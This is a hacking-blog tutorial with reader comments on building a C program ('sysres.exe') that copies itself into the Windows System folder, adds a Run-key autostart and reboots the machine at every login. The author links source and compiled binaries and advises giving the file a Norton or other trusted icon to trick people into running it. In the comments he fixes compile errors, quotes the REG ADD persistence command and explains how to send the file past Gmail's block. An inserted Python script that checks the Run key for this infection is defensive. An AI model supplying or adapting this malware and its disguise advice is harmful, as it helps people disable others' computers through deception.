A Virus Program to Restart the Computer

In this post, I will show you how to create a virus to restart the computer at every startup. That is, upon infection, the computer will get restarted every time the system is booted. As a result, the computer will become inoperable as it reboots again as soon as the desktop is loaded.

For this, the virus needs to be executed only once; from then on, it will carry out the rest of the operation on its own. I have programmed this virus using the C language. If you are familiar with C, the logic behind the code is easy to understand. The code is not posted in this article, but you can download it from the link below.

Compiling the source code into an executable module:

  1. Download the Source Code Here.

  2. UnRar the file and you should see the source code: Sysres.C

  3. For a step-by-step compilation guide, refer to my post: How to compile C Programs?

Testing and removing the virus from your PC:

You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From now on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by following the steps below:

  1. Reboot your computer in the safe mode.

  2. Go to:

    %systemroot%\Windows\System
    (%systemroot% can be C,D,E or F)

  3. You will find a file named sysres.exe; delete it.

  4. Type regedit in the Run dialog to open the Registry Editor. There, navigate to:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

    There, on the right side, you will see an entry named “sres”. Delete this entry. That’s it. You have now removed this virus successfully.

Logic Behind the working of this virus program:

If I did not explain the logic (algorithm) behind the working of the virus program, I think this post would be incomplete. So I’ll explain the logic in a simplified manner without getting much into the technical aspects of the program. If you have further doubts, you can leave a comment.

LOGIC:

  1. First the virus will find the Root partition (Partition on which Windows is installed).

  2. Next, it will determine whether or not the virus file (sysres.exe) is already copied into %systemroot%\Windows\System.

  3. If not, it will place a copy of itself into %systemroot%\Windows\System and make a registry entry to put this virus file into the Windows startup.

  4. Otherwise, if the virus is already found in the %systemroot%\Windows\System directory (folder), it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double-click the Sysres.exe file. The restart will occur from the next boot of the system.
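A triage check for the artifacts named in the removal steps and the logic above, as an added example (not the author's code): it parses the text printed by `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and flags the `sres` value and a `sysres.exe` target. Going beyond the page's two indicators, it also flags any autorun launched from `<drive>:\Windows\System`, which is a heuristic; the sample output and the function names are constructed for illustration.

```python
import ntpath
import re

# Indicators taken from the removal steps on this page.
IOC_VALUE_NAME = "sres"
IOC_FILE_NAME = "sysres.exe"
# Heuristic (assumption): <drive>:\Windows\System, where the page says the copy lives.
DROP_DIR = re.compile(r"^[a-z]:\\windows\\system$")

# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(
    r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)(?:\s{4}(?P<data>.*))?$")

# Constructed sample of `reg query` output for the HKCU Run key.
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Chat Client    REG_SZ    "C:\Program Files\Chat\chat.exe" /minimized
    sres    REG_SZ    C:\windows\system\sysres.exe
    updater    REG_SZ    D:\Windows\System\helper.exe
"""


def parse_reg_query(text):
    """Yield (value_name, value_type, data) for every value line."""
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            yield m.group("name"), m.group("type"), (m.group("data") or "").strip()


def command_target(data):
    """Return the executable path from a Run-key command line."""
    if data.startswith('"'):                      # quoted path, maybe with arguments
        return data[1:].split('"', 1)[0]
    m = re.match(r"(.*?\.(?:exe|com|bat|cmd|scr))(?=\s|$)", data, re.IGNORECASE)
    return m.group(1) if m else data.split(" ", 1)[0]


def triage(text):
    """Return [(value_name, data, reasons)] for entries worth a closer look."""
    findings = []
    for name, _type, data in parse_reg_query(text):
        target = command_target(data).lower()
        reasons = []
        if name.lower() == IOC_VALUE_NAME:
            reasons.append("value-name")          # Run value is called "sres"
        if ntpath.basename(target) == IOC_FILE_NAME:
            reasons.append("file-name")           # target file is sysres.exe
        if DROP_DIR.match(ntpath.dirname(target)):
            reasons.append("drop-dir")            # runs from <drive>:\Windows\System
        if reasons:
            findings.append((name, data, reasons))
    return findings


if __name__ == "__main__":
    for name, data, reasons in triage(SAMPLE):
        print(f"{name!r} -> {data}  [{', '.join(reasons)}]")
```

The `drop-dir` hit on the constructed `updater` entry shows why the directory check is useful: a renamed copy would miss both name-based indicators.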

How to change the icon of the executable module (This step is optional):

After you compile, the sysres.exe file that you get will have a default icon. If you send this file to your friends they may not execute it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example, you can change the icon into Norton antivirus ICON itself so that people seeing this file believe that it is Norton antivirus. Or you can change its ICON into the ICON of any popular or trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How to Change the ICON of an EXE File?

79 Comments

  1. Srikanth
    October 27, 2008 at 6:23 AM

    @ poppernut

    I have used Borland C++ 32 bit compiler.

    Here is the download link and help on how to install and configure the compiler.

    http://dn.codegear.com/article/20633


  2. Poppernut
    October 27, 2008 at 1:57 AM

    I am having trouble with the compiler. is it possible for me to download the exe file with having to do the compiling?


  3. Poppernut
    October 28, 2008 at 12:04 AM

    The Borland compiler is acting weird and it is impossible for me to accomplish anything. I tried Dev-C++ Compiler. Everything works except one thing. The line

    struct ffblk ffblk;//File block structure
    it says “Aggregate ffblk ffblk has incomplete type and cannot be defined”

    Any Idea?

    I know I asked this last time, but can I download the exe file alone?


  4. Srikanth
    October 28, 2008 at 6:09 AM

    @ poppernut

    replace the line

    struct ffblk ffblk

    with the following line and try

    struct ffblk {
    char ff_reserved[21];
    char ff_attrib;
    int ff_ftime;
    int ff_fdate;
    long ff_fsize;
    char ff_name[13];
    }ffblk;


  5. Poppernut
    October 28, 2008 at 9:03 PM

    Lines:

    done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC);

    done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);

    done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0);

    done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);

    done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);

    else

    {
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
    \\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\sysres.exe");

    }
    And all of the

    if(done==0)

    lines have errors.

    It is possible that it has to do with the compiler I am using, for it does not use command lines. I can't use the Borland one though. It keeps messing up.

    This project must be done by Friday for me. I have a schedule to stick to. I can look for something else meanwhile. Sorry to be complaining this much. Is it possible for me to download the exe version of the file, after it has been compiled? That would make this much easier. Thank you for helping me with this matter.


  6. Poppernut
    October 28, 2008 at 9:13 PM

    I tried the Borland compiler again. This time, when I try to open the bcc32, it flashes. Is there another file I should be opening?


  7. Srikanth
    October 29, 2008 at 7:34 AM

    @ poppernut

    You can use Borland C++ 3.0 (16-bit compiler) also.

    C++ 5.5 can only be used via command line. You have to access bcc32 via command line.

    The syntax for compiling is bcc32 filename.c

    The compiled exe file will be in the same directory as bcc32.exe.

    Anyway, leave it if you find some difficulty. I’ll send the compiled project itself.

    The download link is

    http://rapidshare.com/files/158582448/Sysres.rar


  8. Poppernut
    October 29, 2008 at 10:50 PM

    It worked. Thank you very much. I appreciate it. I also love your site. (If I understand correctly, you're the host) The most useful of all is the “How to block websites.” Thanks :)


  9. Srikanth
    October 30, 2008 at 6:59 AM

    Thanks for your kind support…


  10. Anonymous
    October 30, 2008 at 7:33 PM

    thanks for your valuable assist.

    Good Luck


  11. Uriel
    November 11, 2008 at 6:54 AM

    Srikanth, thanks for sharing your knowledge in programming with us we appreciate it and good luck with the site! By the way, is it possible for me to change the file size of the exe file? i want it to look like a legit program or maybe you could teach me how to inject it into a legit file so that in the installation it would run with the legit program. thank you.


  12. Srikanth
    November 11, 2008 at 1:27 PM

    @ uriel,

    This is a bit of a difficult task. For that I should write a new post with all details.

    But you can definitely change the icon of the .exe file to resemble any legit program which I have already discussed!


  13. Uriel
    November 11, 2008 at 3:48 PM

    @ srikanth,

    Thanks for that and I did change the icon to camouflage it just as you discussed in your post, I appreciate your work a lot, I just tried it and wow it scared me alright, now I’ve got some questions. When the virus ran it shows the cmd window “C://Windows/System/sysres.exe” If the person I sent this to (don’t worry he’s a bad guy) acted fast enough within the 60 seconds time limit and deleted the sysres.exe file in the system folder (not in safe mode) but he did not delete the registry entry, will this virus still work? And one more thing if I used notepad (save the source code as .exe) to create the exe file instead of C++ will it work? I’m sorry for the numerous questions but I really want to learn. Thanks!!!


  14. Srikanth
    November 11, 2008 at 5:41 PM

    @ uriel

    If it is deleted once it doesn’t work (even though the entry exists in the registry).

    But it is not possible to create a .exe file using a notepad. You should use C++ compiler only.


  15. Anonymous
    November 18, 2008 at 8:08 AM

    sir, suppose i have a exe file in my pendrive. now my question is is it possible that whenever i connect my pendrive the exe file should automatically get executed. if yes please help me out.sir give me the step by step procedure.


  16. C J Chua
    November 19, 2008 at 5:36 PM

    Hi Srikanth; I think my niece’s computer got infected with your virus, I tried to get into safe mode in order to delete sysres.exe and remove sres via regedit but it restarted everytime on selecting safe mode, please advise, thanks.


  17. Srikanth
    November 20, 2008 at 7:11 AM

    @ C J Chuha

    If your system is restarting even in the safe mode, then it’s definitely not because of my virus. The virus becomes active only when the system is booted normally and not during the safe mode. So, please check your system for other faults!


  18. il-muxu
    November 25, 2008 at 7:58 PM

    i downloaded the virus file you posted and tested it but the computer didn’t restart automatically! what do you think is the problem?


  19. Srikanth
    November 26, 2008 at 1:31 PM

    @ il-muxu

    It’ll restart from the next boot. That is, the infection will come into effect from the next boot.


  20. il-muxu
    November 26, 2008 at 4:43 PM

    yes i did manually reboot the system after i pressed sysres but when it turned on again it stayed on, it didn’t restart pls help.
    thanks for the quick response


  21. yuvaraj
    December 14, 2008 at 8:26 AM

    “THB” virus has affected my pc,how can i remove it please help me sir,


  22. Srikanth
    December 14, 2008 at 11:49 AM

    @ yuvaraj

    Install a good antivirus/antispyware and update it so that the updates are up to date. Then perform full system scan to remove the virus. Recommended antiviruses are

    Kaspersky
    Norton
    Bitdefender


  23. Mobin
    December 16, 2008 at 7:03 AM

    nice work man, really cool virus!!

    i wanted to know if there’s a virus, written in C, which can delete certain files so that the computer never boots again??


  24. 27
    December 16, 2008 at 7:12 AM

    Not bad, but why don’t you use getenv(“WINDIR”) to find the root partition? It would clean up your code, make it more readable, and increase its speed.


  25. Srikanth
    December 16, 2008 at 11:18 AM

    @ Mobin

    Yah,It’s possible to write such a virus…I’ll show how to write such a virus in my coming posts…..


  26. VISHAL
    December 17, 2008 at 12:49 PM

    hi, Shrikant Myself vishal rathore
    you have programmed many viruses.i want to know ,
    Have u programmed any antivirus?


  27. Srikanth
    December 17, 2008 at 3:57 PM

    @ Vishal

    Only virus programming till now. AV programming requires much greater skills.


  28. jody
    December 17, 2008 at 10:15 PM

    Thanks for yer time and effort. nice page


  29. Zals
    December 18, 2008 at 10:36 PM

    Hey Srikanth,i Appreciate ur knowledge and great works..and another thing i like in you is ur gud heart to share ur knowledge with us :)
    keep it up dude…nice website :)


  30. Srikanth
    December 18, 2008 at 11:41 PM

    @ Zals

    Thank you for your kind support. It keeps me motivated!! :)


  31. VISHAL
    December 19, 2008 at 12:30 PM

    Thanks for your reply…………..
    please give me your email id if you have no prob….
    bcoz i want to discuss some problem of my project with you.


  32. Srikanth
    December 19, 2008 at 7:46 PM

    @ Vishal

    Just send ur problem through the contact form on this site.Later I’ll reply from my ID….


  33. vishal
    December 22, 2008 at 5:08 PM

    i want to know where are you.
    i want to know i am doing a project on virus and antivirus.
    this is my M.Tech. degree project.
    so how can i start my project.
    what is the basic thing that can help me in understanding virus and antivirus programming………………


  34. vishal
    December 22, 2008 at 5:09 PM

    thanks for ur reply.
    i want to become your friend…………………


  35. Srikanth
    December 23, 2008 at 12:14 AM

    @ Vishal

    My email is admin@gohacking.com….

    You can contact me through this ID…


  36. raf
    December 25, 2008 at 1:56 AM

    hi srikanth i went through your page, nice. i wanted to know can i find and delete thb virus without an antivirus .


  37. jets
    December 26, 2008 at 10:18 PM

    can i just download the virus and use it?
    i dont understand the codes


  38. Srikanth
    December 26, 2008 at 10:21 PM

    @ jets

    Yes you can download & use it without any problem.After testing it please follow the above mentioned info to remove it.


  39. jets
    December 26, 2008 at 10:55 PM

    by remove u meant the steps about safe booting then go to windows drive and delete then edit registry for it right?
    what if i test this on another old computer and what do i do with this file, like the one i compiled and never opened? can i put it in recycle bin?
    thanks


  40. naggappan
    December 30, 2008 at 11:14 PM

    I have compiled this pgm in the borland c++ (32-bit)compiler every thing works properly. But the only thing is it is not locking in the registry start up programs automatically when the exe file is clicked. but if i add it manually in the registry it works properly.

    is any wrong in the line ,

    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
    CurrentVersion\\Run \/v sres \/t REG_SZ \/d
    C:\\windows\\system\\ sysres.exe”);

    or do i have problem only in my compiler..


  41. Srikanth
    December 30, 2008 at 11:40 PM

    @ naggappan

    Are u using an antivirus with proactive defense?

    May I know which antivirus r u using?

    Compile the source by downloading it. Do not copy-paste the program…


  42. Slim0123
    December 31, 2008 at 12:41 AM

    Nice work Srikanth, but if you would use something like windows.h in the header file and will attach the exe with some ecard(flash exe files) then I think it would not even create any suspicion in the user’s mind, so better mask your programs before sending them to anyone else

    and one more problem is that, these dos based programs are not intended to work on different platforms(if you compile in 64bit machine, it will not work on 32bit and vice versa) so better if you could resolve this problem too(i m a newbie so better you let me know if I m wrong instead of just letting go the post)


  43. Srikanth
    December 31, 2008 at 12:21 PM

    @ Slimright

    The program that I have written is just a simple virus that can be coded in C.

    For advanced viruses we have to make use of TSR concept.


  44. raj
    January 10, 2009 at 10:05 PM

    thanks but its not working in vista anymore…!!!


  45. Srikanth
    January 11, 2009 at 12:06 PM

    @ raj

    It works in vista, but UAC must have been disabled…


  46. Shaan
    January 14, 2009 at 2:25 AM

    Nice work srikanth….This is a great site.. Different from others.. Nice place to share knowledge abt a subject where nowhere else we’ll get 2 knw as its unsafe to visit most of d hacking sites. Keep goin.


  47. Srikanth
    January 14, 2009 at 10:29 AM

    Thanks for your support..


  48. Poppernut
    January 15, 2009 at 3:27 AM

    For those of you who are trying out the program and it is not displaying the message, DEP (Data Execution Prevention) might be the culprit.


  49. vishal
    January 15, 2009 at 5:40 PM

    hi shrikant,
    want to know about the virus signature.
    can u help me.


  50. Srikanth
    January 15, 2009 at 6:27 PM

  51. Jiyar
    January 17, 2009 at 1:48 AM

    hii Srikanth can i just download the virus and use it???
    if Yes Give Me a link plz i cant’ use rapidshare.com or send it to my email


  52. Nilesh
    January 25, 2009 at 12:29 PM

    Cool site dude :-):-) how to create a virus that run automatically without d execution


  53. av
    January 26, 2009 at 5:58 AM

    @nilesh
    This is an advanced mode of programming. You must first know how to code in assembly language (low level programming). Then, the vulnerability of a certain operating system or a targeted running program which can connect to network (such as lsass.exe). These are also called exploits, a technique used by most viruses to spread quickly.

    i recommend the following link:
    http://www.governmentsecurity.org/articles/IntroductiontoBufferOverflow.php


  54. Joel
    January 27, 2009 at 10:25 PM

    yeah i cant get the source and when i use my normal dev c++ i get problems visual studio doesn’t work either. Plus rapidshare is just screwed up for me. Would it be too much trouble for me to ask you to zip both the source and the .exe and post it on mediafire?


  55. Nilesh
    January 28, 2009 at 3:41 PM

    @av
    hey thanks……


  56. Monik
    February 6, 2009 at 7:19 PM

    Hey, cool program man, i have just started learning hacking, but i understand your programs quite well. I have thrashed many computers through these exploits and then i only repaired them and gained the fame in my college. thanks sri for providing such information. i’ll be going through all your articles turn by turn. coz, now my ultimate aim is to become hacker. thanks again.


  57. ricky
    February 13, 2009 at 3:09 PM

    the .exe file doesn’t work…..system does not restart.
    there was no file named sres in the registry plz help


  58. Rajiv
    February 14, 2009 at 5:26 PM

    Can you teach us to make mobile virus using notepad??? I have got 4 mobile virus codes made in notepad– Cabir and Skulls…. Can you help us make more???? Like Curse of Silence??? And is Black Wolf a dreadly virus??? I have just heard its name…


  59. zeroday
    February 15, 2009 at 3:02 AM

    i dont know why u always keep on finding the root dir which can be done thru GetSystemDirectory() function


  60. nik
    February 17, 2009 at 12:37 PM

    hi can u pls help me 2 put som virus into our coll servers


  61. sid
    February 20, 2009 at 5:49 PM

    u have some cool ideas.make some more bright ideas to share with us


  62. Daniel Tatsuki
    February 24, 2009 at 8:30 PM

    Love this site. I can’t wait to infect a friends comp with this. Hehehe.


  63. Karthik
    March 3, 2009 at 6:51 PM

    Hi…….I’ve been having a problem with my comp……..the THB virus has affected it ‘n I’m not able to remove it with my norton which was updated only 3 weeks ago(I’m not able to do so now ‘coz I’m unable to renew it)……..the problem here is my system seems to be linked to the antivirus…..if i delete it to install sumthing like caspersky or avg my system crashes…..I’m at my wits end!!!!….I really need da comp now ‘n I’m not able to use it properly!………..plz help!!!!!


    • Srikanth
      March 5, 2009 at 2:33 PM

      @ Karthik

      Try the following.

      In your C: drive first enable show hidden files in folder options. After that, in the C: drive you can see two hidden files: 1. .icon (with the same picture that you see as drive icon) and 2. autorun.inf. Delete both and restart system……..

      If the above method doesn’t work I recommend you to format and re-install your OS.


  64. Anmaya
    March 13, 2009 at 4:02 PM

    Hi! My PC is infected by a virus that logs off my computer every time I start my computer. If I try to login again, it immediately logs off again. PLZ HELP.


    • Srikanth
      March 13, 2009 at 9:26 PM

      @ Anmaya

      Reboot your PC in the safe mode. To reboot in Safe mode press F8 as soon as your system boot is started. In the safe mode go to Run and type the following in the Run box

      msconfig and press Enter

      In the System configuration Window open the Startup tab. There you’ll see the entry for the virus that is causing the restart. Uncheck the tick mark against it. Reboot your system normally. Everything should be OK from now on…


  65. john
    March 21, 2009 at 12:10 PM

    Dear Srikanth (author),

    Have a wonderful day !

    I wanted to send this virus to my friend just for fun, but I was unable to send it; it says that it is an executable file and you cannot send this type of file for Gmail security reasons. PLEASE HELP here!!!

    John


    • Srikanth
      March 21, 2009 at 7:37 PM

      @ john

      Send it using Yahoo OR upload it to rapidshare and ask your friend to download it by sending the download link via email.


  66. Dhiraj Singh
    March 23, 2009 at 8:27 PM

    Now That is Something Real Stuff……

    Really a very good site for people who want to do something different with ” C “. Really Boss heads off to you.

    Tell me one thing can we upload our codes on your site….so that the knowledge can be shared….only if you allow.

    This is my idea…you keep on rocking man….Gud Luck


    • Srikanth
      March 24, 2009 at 1:12 PM

      @ Dhiraj Singh

      You can share codes but it requires prior approval.


  67. Dhiraj Singh
    March 23, 2009 at 9:50 PM

    Hi Bro…..

    Can We do multithreading with “turboc”.

    or any other method of running two diff process simultaneously with a 16bit C program.


    • Srikanth
      March 25, 2009 at 8:18 PM

      @ Dhiraj Singh

      Turbo C doesn’t support multithreading. Dev C++ will support it.


  68. Dhiraj Singh
    March 24, 2009 at 5:43 PM

    Bro Wat about Multithreading…..

    and one more thing that how to edit registry as you have done…in above code. Can you share some more knowledge on this ….. or any other link which can be useful. Plz Reply soon i m eagerly waiting.

    Thanks Bro for sharing your valuable knowledge….really a great job.


  69. Dhiraj Singh
    March 24, 2009 at 7:40 PM

    Sir,

    The Above Code is not working in Turbo c editor.
    System Command is having no effect…no registry Tweak is Happening. What is the Reason and wat is the solution.


  70. Shashank
    March 30, 2009 at 10:34 AM

    Shrikant, u r simply genius…


  71. MithunRulz
    April 8, 2009 at 10:37 AM

    Heya!!!!

    Well In Ma College Downloading Is Blocked And Aceesing Orkut Is Even Blocked!! :(

    Can U Tell Me Some Wayz To Bypass The Server And Den Download Or Acess Orkut??

    Thnx Man And Ur Site Rulz :D


  72. MithunRulz
    April 8, 2009 at 10:39 AM

    And About Antiviruses I Think Also Dat Avira Antivir Is Also Cool….Wat Do U Think??


  73. Hrithik
    April 9, 2009 at 7:33 PM

    what is the process of the restart virus..can you help me?


  74. Raj Singh
    April 13, 2009 at 1:00 AM

    above code is not working properly
    with turbo c++4.5 ver.
    pls help me out to the solve the problem